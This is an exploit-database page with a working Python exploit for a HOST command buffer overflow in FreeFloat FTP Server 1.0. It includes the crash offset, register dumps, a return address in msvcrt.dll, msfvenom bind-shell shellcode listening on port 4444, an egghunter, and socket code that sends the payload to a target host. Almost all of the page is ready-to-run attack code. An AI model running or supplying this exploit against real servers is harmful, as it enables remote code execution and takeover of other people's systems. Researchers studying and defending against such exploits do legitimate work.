FreeFloat FTP Server 1.0 HOST Buffer Overflow



EKU-ID: 7051 CVE: OSVDB-ID:
Author: 1N3 Published: 2017-11-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#!/usr/bin/python
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
# Date: 11/05/2017
# Exploit Author: 1N3@CrowdShield - https://crowdshield
# Software Link:  http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)
# CVE : N/A

import socket, time

# CONNECT TO HOST
host = "10.0.0.39"
port = 21

# [*] Exact match at offset 246
#buffer = "HOST " + "\x41" * 246 + "\x42" * 4 + "\x43" * 745 + '\r\n'

# AFTER CRASH
#EAX 00000408
#ECX 001FC700
#EDX 77C45E74 ntdll.KiFastSystemCallRet
#EBX 0000001A
#ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EBP 016D13F0
#ESI 0040A29E FTPServer.0040A29E
#EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EIP 42424242

# !mona suggest
# 0BADF00D  [+] Examining registers
# 0BADF00D      EIP contains normal pattern : 0x41326941 (offset 246)
# 0BADF00D      ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742)
# 0BADF00D      EDI (0x01741d24) points at offset 727 in normal pattern (length 273)

# CALL EDI - msvcrt.dll
#Found commands (All modules), item 5241
# Address=77D918F6
# Disassembly=CALL EDI
# Module Name=C:\Windows\system32\msvcrt.dll

# BIND SHELL
# msfvenom  -p windows/shell_bind_tcp LPORT=4444 -f python -b "\x0a\x00\x0d"
# Payload size: 355 bytes + 4 byte egg = 359 bytes
# Final size of python file: 1710 bytes
bind_shell =  "T00WT00W"
bind_shell += "\xdd\xc2\xbf\x9a\xa8\x28\x21\xd9\x74\x24\xf4\x5d\x33"
bind_shell += "\xc9\xb1\x53\x31\x7d\x17\x83\xc5\x04\x03\xe7\xbb\xca"
bind_shell += "\xd4\xeb\x54\x88\x17\x13\xa5\xed\x9e\xf6\x94\x2d\xc4"
bind_shell += "\x73\x86\x9d\x8e\xd1\x2b\x55\xc2\xc1\xb8\x1b\xcb\xe6"
bind_shell += "\x09\x91\x2d\xc9\x8a\x8a\x0e\x48\x09\xd1\x42\xaa\x30"
bind_shell += "\x1a\x97\xab\x75\x47\x5a\xf9\x2e\x03\xc9\xed\x5b\x59"
bind_shell += "\xd2\x86\x10\x4f\x52\x7b\xe0\x6e\x73\x2a\x7a\x29\x53"
bind_shell += "\xcd\xaf\x41\xda\xd5\xac\x6c\x94\x6e\x06\x1a\x27\xa6"
bind_shell += "\x56\xe3\x84\x87\x56\x16\xd4\xc0\x51\xc9\xa3\x38\xa2"
bind_shell += "\x74\xb4\xff\xd8\xa2\x31\x1b\x7a\x20\xe1\xc7\x7a\xe5"
bind_shell += "\x74\x8c\x71\x42\xf2\xca\x95\x55\xd7\x61\xa1\xde\xd6"
bind_shell += "\xa5\x23\xa4\xfc\x61\x6f\x7e\x9c\x30\xd5\xd1\xa1\x22"
bind_shell += "\xb6\x8e\x07\x29\x5b\xda\x35\x70\x34\x2f\x74\x8a\xc4"
bind_shell += "\x27\x0f\xf9\xf6\xe8\xbb\x95\xba\x61\x62\x62\xbc\x5b"
bind_shell += "\xd2\xfc\x43\x64\x23\xd5\x87\x30\x73\x4d\x21\x39\x18"
bind_shell += "\x8d\xce\xec\xb5\x85\x69\x5f\xa8\x68\xc9\x0f\x6c\xc2"
bind_shell += "\xa2\x45\x63\x3d\xd2\x65\xa9\x56\x7b\x98\x52\x49\x20"
bind_shell += "\x15\xb4\x03\xc8\x73\x6e\xbb\x2a\xa0\xa7\x5c\x54\x82"
bind_shell += "\x9f\xca\x1d\xc4\x18\xf5\x9d\xc2\x0e\x61\x16\x01\x8b"
bind_shell += "\x90\x29\x0c\xbb\xc5\xbe\xda\x2a\xa4\x5f\xda\x66\x5e"
bind_shell += "\xc3\x49\xed\x9e\x8a\x71\xba\xc9\xdb\x44\xb3\x9f\xf1"
bind_shell += "\xff\x6d\xbd\x0b\x99\x56\x05\xd0\x5a\x58\x84\x95\xe7"
bind_shell += "\x7e\x96\x63\xe7\x3a\xc2\x3b\xbe\x94\xbc\xfd\x68\x57"
bind_shell += "\x16\x54\xc6\x31\xfe\x21\x24\x82\x78\x2e\x61\x74\x64"
bind_shell += "\x9f\xdc\xc1\x9b\x10\x89\xc5\xe4\x4c\x29\x29\x3f\xd5"
bind_shell += "\x59\x60\x1d\x7c\xf2\x2d\xf4\x3c\x9f\xcd\x23\x02\xa6"
bind_shell += "\x4d\xc1\xfb\x5d\x4d\xa0\xfe\x1a\xc9\x59\x73\x32\xbc"
bind_shell += "\x5d\x20\x33\x95"

# 32 BYTE EGGHUNTER
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# CALL EDI - msvcrt.dll
eip = "\xF6\x18\xD9\x77"

buffer = "HOST " + "\x41" * 246 + eip + "\x90" * 10 + bind_shell + "\x90" * 241 + egghunter + '\r\n'

try:
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((host,port))
	print sock.recv(1024)
	sock.settimeout(10)

	print "Sending buffer..."
	print str(buffer)
	sock.sendto(buffer, (host, port))
	print "Sent!"

except:
	print "socket connection failed!"

time.sleep(1)

print "Done!"